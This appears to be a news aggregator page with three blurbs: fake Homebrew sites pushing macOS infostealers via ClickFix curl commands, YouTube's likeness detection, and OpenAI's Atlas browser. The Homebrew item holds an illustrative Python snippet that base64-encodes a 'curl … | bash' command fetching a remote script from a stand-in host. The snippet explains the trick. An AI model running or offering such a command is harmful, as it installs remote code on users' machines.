
Fake Homebrew Google Ads Push Malware Onto macOS

2 weeks 1 day ago
joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques, in which targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...]. When checking some of the domains, BleepingComputer discovered that in some cases traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command into their Terminal to install them, the researchers say. In other cases, such as for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.
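To illustrate why base64 encoding helps this trick, here is a minimal sketch of the clipboard swap described above. The "verification ID," the encoded string, and the URL are all hypothetical stand-ins, not the actual payloads from the campaign:

```python
import base64

# What the page visibly shows the victim (hypothetical value):
displayed_text = "Cloudflare verification ID: 8f3a-42c1"

# What a malicious 'copy' button could place on the clipboard instead --
# a base64-encoded install command (hypothetical URL, not the real one):
payload = b"curl -fsSL https://example.invalid/install.sh | bash"
clipboard_text = base64.b64encode(payload).decode()

# The encoded string looks like opaque token data, not a shell command,
# so a victim pasting it into Terminal has no obvious warning sign:
print(clipboard_text)

# Decoding reveals the command that would actually execute:
print(base64.b64decode(clipboard_text).decode())
```

The encoding adds no real obfuscation against analysis, but it makes the copied string resemble the kind of token a "verification step" might plausibly ask for.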

Read more of this story at Slashdot.

BeauHD

YouTube's Likeness Detection Has Arrived To Help Stop AI Doppelgangers

2 weeks 1 day ago
An anonymous reader quotes a report from Ars Technica: AI content has proliferated across the Internet over the past few years, but those early confabulations with mutated hands have evolved into synthetic images and videos that can be hard to differentiate from reality. Having helped to create this problem, Google has some responsibility to keep AI video in check on YouTube. To that end, the company has started rolling out its promised likeness detection system for creators. [...] The likeness detection tool, which is similar to the site's copyright detection system, has now expanded beyond the initial small group of testers. YouTube says the first batch of eligible creators have been notified that they can use likeness detection, but interested parties will need to hand Google even more personal information to get protection from AI fakes. Currently, likeness detection is a beta feature in limited testing, so not all creators will see it as an option in YouTube Studio. When it does appear, it will be tucked into the existing "Content detection" menu. In YouTube's demo video, the setup flow appears to assume the channel has only a single host whose likeness needs protection. That person must verify their identity, which requires a photo of a government ID and a video of their face. It's unclear why YouTube needs this data in addition to the videos people have already posted with their oh-so stealable faces, but rules are rules. After signing up, YouTube will flag videos from other channels that appear to have the user's face. YouTube's algorithm can't know for sure what is and is not an AI video. So some of the face match results may be false positives from channels that have used a short clip under fair use guidelines. If creators do spot an AI fake, they can add some details and submit a report in a few minutes. 
If the video includes content copied from the creator's channel that does not adhere to fair use guidelines, YouTube suggests also submitting a copyright removal request. However, just because a person's likeness appears in an AI video does not necessarily mean YouTube will remove it.


BeauHD

OpenAI releases bot-tom feeding browser with ChatGPT built in

2 weeks 1 day ago
Why experience the web for yourself when there's so much privacy to surrender?

In a bid to grab even more eyeballs, OpenAI has finally released Atlas, its long-teased, ChatGPT-powered web browser. Surfing the web may never be the same now that a bot is doing it for you – while training itself at the same time.…

Thomas Claburn